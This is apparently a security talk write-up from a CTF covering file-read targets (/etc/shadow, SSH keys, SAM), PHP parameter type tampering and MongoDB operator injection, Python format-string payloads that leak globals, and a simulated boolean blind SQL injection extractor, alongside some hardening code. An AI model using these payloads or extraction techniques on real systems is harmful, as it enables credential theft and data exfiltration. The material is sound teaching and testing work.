From Input to Injection

Practical Lessons from HKIRC CTF


@TrebledJ   •   2024 Aug. 14

1 — Interesting Techniques

2 — Boolean SQLi: PoC to Flag in 5 Minutes

From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

1.1 — Arbitrary File Reads with /proc/**

Where do we usually look when we have an arbitrary file read? (On Linux)

  • /etc/passwd, /etc/shadow - users, hashes
  • /home/<user>/.ssh/authorized_keys - SSH public keys, algos
  • /home/<user>/.ssh/id_* - SSH private keys
  • /proc/<pid>/cmdline - commands!!! + file structure!!!
  • /proc/<pid>/environ - env when process started
  • /proc/<pid>/cwd - cwd when process started

What about Windows?

Files:

C:\inetpub\web.config
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\SAM
C:\Users\<username>\ntuser.dat    # registry hive

What about command line info?

# PowerShell
Get-WmiObject -Class Win32_Process | Select-Object CommandLine

# cmd.exe
wmic process get CommandLine

But not a file. :(


1.2 — PHP Parameter Tampering

login.php (simplified):

$username = $_GET['username'];
$password = $_GET['password'];
$userinfo = ...; // (optional) user-controlled input, e.g. taken straight from the request

$userinfo["id"] = ...;
$userinfo["username"] = $username;
$userinfo["password"] = $password;
$_SESSION["userinfo"] = $userinfo;

Normal usage:

POST /login.php HTTP/1.1
...

username=darklab&password=123456

$userinfo

  • Originally array(), but the request can tamper it into a string.
  • On a string, a non-numeric key such as ["id"] is treated as offset [0], so every assignment below overwrites the same first byte. (PHP 7 behaviour, with an "Illegal string offset" warning; PHP 8 throws an error instead.)

Data Type Tampering:

POST /login.php HTTP/1.1
...

username=darklab&password=123456&userinfo=abc

$userinfo = "abc";
$userinfo["id"] = "123";            // $userinfo[0] = '1'  ->  "1bc"
$userinfo["username"] = "admin";    // $userinfo[0] = 'a'  ->  "abc"
$userinfo["password"] = "password"; // $userinfo[0] = 'p'  ->  "pbc"

$_SESSION["userinfo"] = $userinfo;

CVEs?

Couldn't find.

POST /login.php HTTP/1.1
...

user=joe&password=123456
=> $_POST = array('user' => 'joe', 'password' => '123456')

POST /search.php HTTP/1.1
...

user[$ne]=joe&password=123456
=> $_POST = array('user' => array('$ne' => 'joe'), 'password' => '123456')

Potential MongoDB injection! Also check out PHP Type Juggling.
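
Added for this write-up (not code from the slides or from PHP itself): a Python model of how PHP turns a request body into $_POST, followed by the per-parameter type check that login.php is missing. php_parse_qs, mistyped_params and EXPECTED_TYPES are names chosen here; the parser is a simplified model of PHP's bracket syntax, not PHP's own implementation.

```python
from urllib.parse import unquote_plus

def php_parse_qs(query: str) -> dict:
    """Build a dict the way PHP builds $_POST/$_GET from a body:
    'a=1' -> {'a': '1'}, 'a[b]=1' -> {'a': {'b': '1'}},
    'a[]=1&a[]=2' -> {'a': {0: '1', 1: '2'}}.
    Simplified model written for this note (PHP also rewrites '.' and ' '
    in top-level names); it is enough to show the type-confusion problem."""
    result = {}
    for pair in query.split("&"):
        if not pair:
            continue
        raw_key, _, raw_val = pair.partition("=")
        key, val = unquote_plus(raw_key), unquote_plus(raw_val)
        base, _, rest = key.partition("[")
        # 'b][c]' -> ['b', 'c']; 'a[]' leaves rest == ']' -> [''] meaning "append"
        path = [base] + (rest.rstrip("]").split("][") if rest else [])
        node = result
        for part in path[:-1]:
            if not isinstance(node.get(part), dict):
                node[part] = {}          # a scalar already here is overwritten
            node = node[part]
        last = path[-1]
        if last == "":                   # a[]=v appends at the next integer key
            last = 1 + max((k for k in node if isinstance(k, int)), default=-1)
        node[last] = val
    return result

# What login.php assumes about each parameter (PHP string = str, PHP array = dict).
EXPECTED_TYPES = {"user": str, "username": str, "password": str, "userinfo": dict}

def mistyped_params(params: dict, expected: dict = EXPECTED_TYPES) -> list:
    """Names of supplied parameters whose type is not what the code assumes.
    Catches both 'userinfo=abc' (string where an array is assumed, so ["id"]
    silently becomes [0]) and 'user[$ne]=joe' (array where a string is
    assumed, which is what lets a MongoDB operator through)."""
    return [name for name, typ in expected.items()
            if name in params and not isinstance(params[name], typ)]
```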

1.3 — Python Format String Injection

DEMO \o/

Ultra Simplified Example:

PASSWORD = 'password_5910f7f523cd780c67'

class Car:
    def __init__(self, make, year, color):
        self.make, self.year, self.color = make, year, color
    
    def __str__(self):
        return f'Car(make={self.make},year={self.year},color={self.color})'

print(input('Input: ').format(Car('Toyota', 2020, 'Blue')))
# Sample input that reads the module global: {0.__init__.__globals__[PASSWORD]}

  • Info disclosure!
  • () - function call doesn't work. No RCE :(

But what if the variable is in a different file?

No problem!

{user.__init__.__globals__[__loader__] \
 .__init__.__globals__[sys].modules[HealthyBMI.settings] \
 .__dict__[FLAG]}

# user_controlled_string.format(user=request.user)

  1. Get loader (importer).
  2. Get module.
  3. Get global symbol.
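
The Car demo above, as an added example (not the slide's own code) with its hardened counterpart: render_unsafe reproduces the vulnerable call, and StrictFormatter is a string.Formatter subclass that accepts only bare, allow-listed field names, so the traversal payload, conversion flags and format specs are all refused. All names here are chosen for this note.

```python
import string

PASSWORD = 'password_5910f7f523cd780c67'   # constructed secret, as on the slide

class Car:
    def __init__(self, make, year, color):
        self.make, self.year, self.color = make, year, color

def render_unsafe(template: str, car: Car) -> str:
    # Vulnerable form from the slide: the user controls the template, and
    # str.format lets a field walk from the Car instance into module globals.
    return template.format(car)

class StrictFormatter(string.Formatter):
    """Resolves only bare field names from an allow-list: no attribute or
    index traversal, no conversion flags, no format spec."""
    def __init__(self, allowed):
        super().__init__()
        self.allowed = frozenset(allowed)

    def get_field(self, field_name, args, kwargs):
        # get_field receives the whole field text, e.g. '0.__init__.__globals__[PASSWORD]',
        # so an exact allow-list match rejects every traversal payload.
        if field_name not in self.allowed:
            raise ValueError(f"disallowed field: {field_name!r}")
        return kwargs[field_name], field_name

    def convert_field(self, value, conversion):
        if conversion is not None:          # {x!r} would expose repr() output
            raise ValueError("conversion flags are not allowed")
        return value

    def format_field(self, value, format_spec):
        if format_spec:                     # {x:>999999999} is a memory DoS
            raise ValueError("format specs are not allowed")
        return str(value)

def render_safe(template: str, car: Car) -> str:
    # Hardened: expose only the three scalar attributes, by name.
    return StrictFormatter(["make", "year", "color"]).format(
        template, make=car.make, year=car.year, color=car.color)

def is_rejected(template: str, car: Car) -> bool:
    """True if render_safe refuses the template."""
    try:
        render_safe(template, car)
    except ValueError:
        return True
    return False
```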

Real Problems, Real Vulns

Various Python format-string CVEs:

  • CVE-2014-6262 - rrdtool (bandwidth/temp/CPU load collector) → RCE, DoS

2 — Boolean SQLi: PoC to Flag in 5 Minutes


My Secret Sauce — bsqli.py

  • Used in OSCP + Multiple Engagements
  • Employs similar tricks used by SQLmap, but urges the user to take more control
  • Prettier interface (IMHO): CLI, multiprocessing
  • https://github.com/TrebledJ/bsqli.py

Demo Walkthrough

\o/ DEMO \o/

Basic PoC

PoC with Script: Get DB Version


Get Table Names (starting with f)

Get DB Name

Get Columns. (SELECT * won't work because a subquery in this position must return exactly one column.)


Now that we know the db, table, and column, we can select-from it.

GG!
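
A compact model of the oracle loop that bsqli.py automates, added here as an example (not the tool's code), run against a constructed in-memory SQLite table rather than a live target. It walks the same steps as the demo (version-style subquery, table names starting with f, then the data) and counts oracle calls, which is the request volume a boolean-blind extraction leaves in access logs. oracle, extract, STATS and the flags table are assumptions of this note.

```python
import sqlite3

# Constructed lab database standing in for the CTF target; nothing here
# touches the network.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE flags (id INTEGER, flag TEXT)")
conn.execute("INSERT INTO flags VALUES (1, 'flag{demo}')")
STATS = {"queries": 0}

def oracle(condition: str) -> bool:
    """Stand-in for the injectable endpoint: the app reveals only whether the
    WHERE clause matched (true page) or not (false page). The string
    concatenation is the injection point being modelled."""
    STATS["queries"] += 1
    row = conn.execute(
        f"SELECT 1 FROM flags WHERE id = 1 AND ({condition})").fetchone()
    return row is not None

def extract(subquery: str, max_len: int = 64) -> str:
    """Recover the single-column, single-row string that `subquery` returns,
    one character at a time, by binary search over UNICODE(SUBSTR(...)).
    Assumes printable ASCII; a code point above 127 ends extraction early."""
    out = ""
    for pos in range(1, max_len + 1):
        char = f"unicode(substr(({subquery}), {pos}, 1))"
        lo, hi = 1, 127
        while lo < hi:                      # 6-7 oracle calls per character
            mid = (lo + hi) // 2
            if oracle(f"{char} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        # Past the end of the string substr() yields '' and unicode('') is NULL,
        # so every comparison above was false and this final check fails too.
        if not oracle(f"{char} = {lo}"):
            break
        out += chr(lo)
    return out

def queries_used() -> int:
    """Oracle calls so far: the number of near-identical requests a log would show."""
    return STATS["queries"]
```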

Why go deeper?

  • Explore Attack Chain - discover creds, users, PII, etc.
  • Client may not understand the risk from a "version PoC".
    • "Ok. So we're using MySQL 8.33. Big deal." - Oblivious Person
  • Understand their systems design.
    • Multiple apps using the same DB is a risk.
    • UAT and prod using the same DB is a risk.

Resources

Techniques


bsqli.py


Slides are available at: https://trebledj.me/slides/


Hope you enjoyed!

Build commands (Marp CLI):

Thumbnail:
npx @marp-team/marp-cli@latest --theme-set nord.css --image jpeg -o from-input-to-injection.jpg .

Server:
npx @marp-team/marp-cli@latest --theme-set nord.css --html .

HTML:
npx @marp-team/marp-cli@latest --theme-set nord.css --html -o 2024-08-14-from-input-to-injection.html --title 'From Input to Injection: Practical Lessons from HKIRC CTF' --description 'Casual sharing on interesting techniques we picked up from HKIRC CTF: arbitrary file reads, PHP parameter tampering, and Python format string injection. We also explore how to automate boolean SQL injection for speed and fun.' --url https://trebledj.me/slides/from-input-to-injection/ --og-image /img/slides/from-input-to-injection.jpg pres.md

PDF:
npx @marp-team/marp-cli@latest --theme-set nord.css --html -o 2024-08-14-from-input-to-injection.pdf --pdf --allow-local-files .

Did I miss anything?

Reference: [Linux File System - `/proc`](https://tldp.org/LDP/Linux-Filesystem-Hierarchy/html/proc.html)

But on a related note...

PHP types are more brittle than you think.

References: [Read Gadgets](https://book.hacktricks.xyz/generic-methodologies-and-resources/python/python-internal-read-gadgets) • [Python Format String](https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#sensitive-information-disclosure-payloads)

Django app!

FrappeFramework: Low code SAAS. Think of it as a CMS.

Questions!??

Who has discovered and exploited this in engagements?

- Ramble

Walkthrough SQLite Demo:

- Basic PoC

- PoC with UNICODE/SUBSTRING

- PoC with script

Share about that engagement with multiple subsidiaries.

Takeaways

  • Speed matters.
  • Enumerate both widely and deeply.
  • If you repeat something *a lot*, consider automating it.
  • Downside: (probably) no BD hours.